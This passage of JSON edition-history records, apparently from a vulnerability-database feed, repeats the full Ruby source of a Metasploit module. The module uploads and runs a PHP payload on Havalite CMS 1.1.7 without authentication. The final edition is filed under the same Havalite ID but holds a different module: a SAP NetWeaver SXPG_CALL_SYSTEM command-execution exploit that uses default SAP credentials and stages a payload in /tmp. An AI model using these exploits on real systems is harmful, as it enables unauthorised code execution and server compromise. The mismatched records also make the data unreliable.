"1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-20T22:31:16", "differentElements": ["sourceData"], "edition": 80}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-21T02:28:24", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2019-06-21T02:28:24"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1831-1:3FBA4", "DEBIAN:DSA-4468-1:3B1FA", "DEBIAN:DLA-1789-2:82C69", "DEBIAN:DLA-1830-1:B6D9B", "DEBIAN:DLA-1828-1:261F9", "DEBIAN:DLA-1829-1:1DF99", "DEBIAN:DSA-4447-2:8C972"]}, {"type": "ubuntu", "idList": ["USN-4030-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1579"]}, {"type": "redhat", "idList": ["RHSA-2019:1587", "RHSA-2019:1580", "RHSA-2019:1579", "RHSA-2019:1578", "RHSA-2019:1571", "RHSA-2019:1569", "RHSA-2019:1553"]}, {"type": "centos", "idList": ["CESA-2019:1579", "CESA-2019:1578", "CESA-2019:1467"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1590-1"]}], "modified": "2019-06-21T02:28:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T02:28:24", "differentElements": ["sourceData"], "edition": 81}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-02T09:56:39", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2019-07-02T09:56:39"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1652", "RHSA-2019:1650"]}, {"type": "f5", "idList": ["F5:K61002104"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4475-1:F4ED8", "DEBIAN:DSA-4474-1:307BE", "DEBIAN:DLA-1842-1:F4FA5", "DEBIAN:DLA-1837-2:545B2"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1688-1", "OPENSUSE-SU-2019:1682-1", "OPENSUSE-SU-2019:1683-1", "OPENSUSE-SU-2019:1671-1", "OPENSUSE-SU-2019:1672-1"]}, {"type": "centos", "idList": ["CESA-2019:1624", "CESA-2019:1604", "CESA-2019:1619", "CESA-2019:1626", "CESA-2019:1603"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:3DE63687DC86330D338555D366AA18D3"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:5E2208DC182B2AA0CFD7A09B6797D218"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC"]}], "modified": "2019-07-02T09:56:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-02T09:56:39", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and 
possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-02T11:54:35", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-07-02T11:54:35"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1663", "RHSA-2019:1661", "RHSA-2019:1652", "RHSA-2019:1650"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1689-1", "OPENSUSE-SU-2019:1690-1", "OPENSUSE-SU-2019:1688-1", "OPENSUSE-SU-2019:1682-1", "OPENSUSE-SU-2019:1683-1"]}, {"type": "f5", "idList": ["F5:K61002104"]}, {"type": "exploitdb", "idList": ["EDB-ID:47070"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4475-1:F4ED8", "DEBIAN:DSA-4474-1:307BE", "DEBIAN:DLA-1842-1:F4FA5"]}, {"type": "centos", "idList": ["CESA-2019:1624", "CESA-2019:1604", "CESA-2019:1619", "CESA-2019:1626", "CESA-2019:1603"]}, {"type": "cve", "idList": ["CVE-2019-4057"]}], "modified": "2019-07-02T11:54:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-02T11:54:35", "differentElements": ["sourceData"], "edition": 83}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T19:36:25", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-07-02T11:54:35"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1663", "RHSA-2019:1661", "RHSA-2019:1652", "RHSA-2019:1650"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1689-1", "OPENSUSE-SU-2019:1690-1", "OPENSUSE-SU-2019:1688-1", "OPENSUSE-SU-2019:1682-1", "OPENSUSE-SU-2019:1683-1"]}, {"type": "f5", "idList": ["F5:K61002104"]}, {"type": "exploitdb", "idList": ["EDB-ID:47070"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4475-1:F4ED8", "DEBIAN:DSA-4474-1:307BE", "DEBIAN:DLA-1842-1:F4FA5"]}, {"type": "centos", "idList": ["CESA-2019:1624", "CESA-2019:1604", "CESA-2019:1619", "CESA-2019:1626", "CESA-2019:1603"]}, {"type": "cve", "idList": ["CVE-2019-4057"]}], "modified": "2019-07-02T11:54:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T19:36:25", "differentElements": ["sourceData"], "edition": 84}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T20:27:17", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-07-10T20:27:17"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1742", "RHSA-2019:1726", "RHSA-2019:1723", "RHSA-2019:1722", "RHSA-2019:1714", "RHSA-2019:1712", "RHSA-2019:1711", "RHSA-2019:1708", "RHSA-2019:1707", "RHSA-2019:1706"]}, {"type": "zdt", "idList": ["1337DAY-ID-32964"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1726"]}, {"type": "xen", "idList": ["XSA-300"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1848-1:EAD27", "DEBIAN:DLA-1849-1:F1C41", "DEBIAN:DSA-4477-1:C1A86"]}, {"type": "ubuntu", "idList": ["USN-4051-1", "USN-4052-1"]}, {"type": "freebsd", "idList": ["0592F49F-B3B8-4260-B648-D1718762656C"]}], "modified": "2019-07-10T20:27:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T20:27:17", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 85}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "3182350f85970b0c24027f622debf206", "type": "metasploit", "bulletinFamily": "exploit", "title": "SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution", "description": "This module abuses the 
SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64-bit and Linux 64-bit platforms.\n", "published": "2013-05-07T22:01:56", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"], "cvelist": [], "lastseen": "2019-07-22T06:53:51", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-07-22T06:53:51"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1785-1", "OPENSUSE-SU-2019:1782-1", "OPENSUSE-SU-2019:1781-1", "OPENSUSE-SU-2019:1777-1", "OPENSUSE-SU-2019:1780-1", "OPENSUSE-SU-2019:1775-1", "OPENSUSE-SU-2019:1771-1", "OPENSUSE-SU-2019:1773-1", "OPENSUSE-SU-2019:1759-1", "OPENSUSE-SU-2019:1767-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1859-1:5A253", "DEBIAN:DSA-4486-1:B09C5", "DEBIAN:DSA-4485-1:63763", "DEBIAN:DLA-1858-1:1A45F", "DEBIAN:DLA-1857-1:9A05E"]}], "modified": "2019-07-22T06:53:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy.\n#\n# The following guys from 
ERP-SCAN deserve credit for their contributions -\n# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and\n# Dmitry Evdokimov.\n#\n# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis\n# who have Beta tested the modules and provided excellent feedback. Some people\n# just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',\n 'Description' => %q{\n This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP\n RFC Service, to execute remote commands. This module needs SAP credentials with\n privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested\n successfully on Windows 2008 64-bit and Linux 64-bit platforms.\n },\n 'References' =>\n [\n [ 'OSVDB', '93537' ],\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'DisclosureDate' => 'Mar 26 2013',\n 'Platform' => %w{ unix win },\n 'Targets' => [\n [ 'Linux',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix'\n #'Payload' =>\n #{\n #'DisableNops' => true,\n #'Space' => 232,\n #'Compat' =>\n #{\n #'PayloadType' => 'cmd',\n #'RequiredCmd' => 'perl ruby',\n #}\n #}\n }\n ],\n [ 'Windows x64',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'win',\n 'CmdStagerFlavor' => 'vbs'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'Author' =>\n [\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP Client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992'])\n ])\n register_advanced_options(\n [\n OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 
250]),\n ])\n end\n\n def send_soap_request(data)\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],\n 'ctype' => 'text/xml; charset=UTF-8',\n 'headers' => {\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n return res\n end\n\n def build_soap_request(command, sap_command, sap_os)\n data = \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\" ?>\"\n data << \"<env:Envelope xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\" xmlns:env=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\">\"\n data << \"<env:Body>\"\n data << \"<n1:SXPG_CALL_SYSTEM xmlns:n1=\\\"urn:sap-com:document:sap:rfc:functions\\\" env:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\n data << \"<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\"\n data << \"<COMMANDNAME>#{sap_command}</COMMANDNAME>\"\n data << \"<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\"\n data << \"<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>\"\n data << \"</n1:SXPG_CALL_SYSTEM>\"\n data << \"</env:Body>\"\n data << \"</env:Envelope>\"\n return data\n end\n\n def check\n data = rand_text_alphanumeric(4 + rand(4))\n res = send_soap_request(data)\n if res and res.code == 500 and res.body =~ /faultstring/\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if target.name =~ /Windows/\n linemax = datastore['PAYLOAD_SPLIT']\n vprint_status(\"#{rhost}:#{rport} - Using custom payload size of #{linemax}\") if linemax != 250\n print_status(\"#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request\")\n execute_cmdstager({ :delay => 0.35, :linemax => linemax })\n elsif target.name =~ 
/Linux/\n file = rand_text_alphanumeric(5)\n stage_one = create_unix_payload(1,file)\n print_status(\"#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...\")\n res = send_soap_request(stage_one)\n if res and res.code == 200 and res.body =~ /External program terminated/\n print_good(\"#{rhost}:#{rport} - Payload dump was successful\")\n else\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Payload dump failed\")\n end\n stage_two = create_unix_payload(2,file)\n print_status(\"#{rhost}:#{rport} - Executing /tmp/#{file}...\")\n send_soap_request(stage_two)\n end\n end\n\n def create_unix_payload(stage, file)\n command = \"\"\n if target.name =~ /Linux/\n if stage == 1\n my_payload = payload.encoded.gsub(\" \",\"\\t\")\n my_payload.gsub!(\"&\",\"&\")\n my_payload.gsub!(\"<\",\"<\")\n command = \"-o /tmp/\" + file + \" -n pwnie\" + \"\\n!\"\n command << my_payload\n command << \"\\n\"\n elsif stage == 2\n command = \"-ic /tmp/\" + file\n end\n\n end\n\n return build_soap_request(command.to_s, \"DBMCLI\", \"ANYOS\")\n end\n\n def execute_command(cmd, opts)\n command = cmd.gsub(/&/, \"&\")\n command.gsub!(/%TEMP%\\\\/, \"\")\n data = build_soap_request(\"&#{command}\", \"LIST_DB2DUMP\", \"ANYOS\")\n begin\n res = send_soap_request(data)\n if res and res.code == 200\n return\n else\n if res and res.body =~ /faultstring/\n error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})\n 0.upto(error.length-1) do |i|\n vprint_error(\"#{rhost}:#{rport} - Error #{error[i]}\")\n end\n end\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Error injecting command\")\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport} - Unable to connect\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T06:53:51", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 86}, {"bulletin": {"id": 
